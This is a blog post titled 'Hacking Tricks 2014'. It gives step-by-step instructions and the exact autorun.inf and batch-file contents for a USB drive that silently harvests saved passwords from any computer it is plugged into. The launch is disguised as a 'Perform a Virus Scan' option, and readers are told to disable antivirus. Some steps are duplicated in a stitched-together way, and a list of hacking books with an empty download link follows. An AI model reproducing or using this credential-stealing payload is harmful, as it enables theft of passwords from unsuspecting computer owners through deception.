HACKING TRICKS 2014.......UPDATED

Follow some easy step:
First of all you need to download following 5 software.
MessenPass
Mail PassView
IE Pass View
Protected Storage PassView
Password Fox
DOWNLOAD LINK:

NOTE: You must temporarily disable your antivirus before following these steps.
Step:1 Now extract all and copy only .exe file like mspass.exe, mailpv.exe, iepv.exe, pspv.exe and passwordfox.exe into usb pen drive
Step:2 Now create a batch file with following code
Open note pad and paste following red color text.
------------------------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------------------

TABLE OF CONTENTS:
AND MANY MORE................................
1.
Follow some easy step:
First of all you need to download following 5 software.
DOWNLOAD LINK:
NOTE: You must temporarily disable your antivirus before following these steps.
Step:1 Now extract all and copy only .exe file like mspass.exe, mailpv.exe, iepv.exe, pspv.exe and passwordfox.exe into usb pen drive
Step:2 Now create a batch file with following code
Open note pad and paste following red color text.
[autorun]
open=launch.bat
ACTION= Perform a Virus Scan
save the Notepad and rename it from
New Text Document.txt to autorun.inf
Now copy theautorun.inf file onto your USB pendrive.
3. Create another Notepad and write the following text onto it:
start mspass.exe /stext mspass.txt
start mailpv.exe /stext mailpv.txt
start iepv.exe /stext iepv.txt
start pspv.exe /stext pspv.txt
start passwordfox.exe /stext passwordfox.txt
- And save as with launch.bat (must .bat)
- Copy also launch.bat file into usb pen drive
- Now your usb pen drive is rady to hack any computer passwords.
- Insert usb pen drives and auto run window is open
- Now click on first option (Perform a Virus Scan)
- Now all passwords hack silently get executed in the background. All password save in .txt file
------------------------------------------------------------------------------------------------------------------------
------------------------------------------------------------------------------------------------------------------------
2.
TABLE OF CONTENTS:
1. ARMITAGE.
2. BACKTRACK.
3. BLIND SQL INJECTION.
4. THE WEB APPLICATIONS HACKERS HANDBOOK.
5. CEH &CSRF_ATTACKS AND DEFENSE.
6. ETHICAL HACKING AND COUNTER MEASURES.
7. HACKING WIRELESS NETWORKS
8. XSS HANDBOOKS
9. SHELL CODERS_HANDBOOK.
10. REVERSE ENGINEERING
AND MANY MORE................................
DOWNLOAD LINK:
No comments:
Post a Comment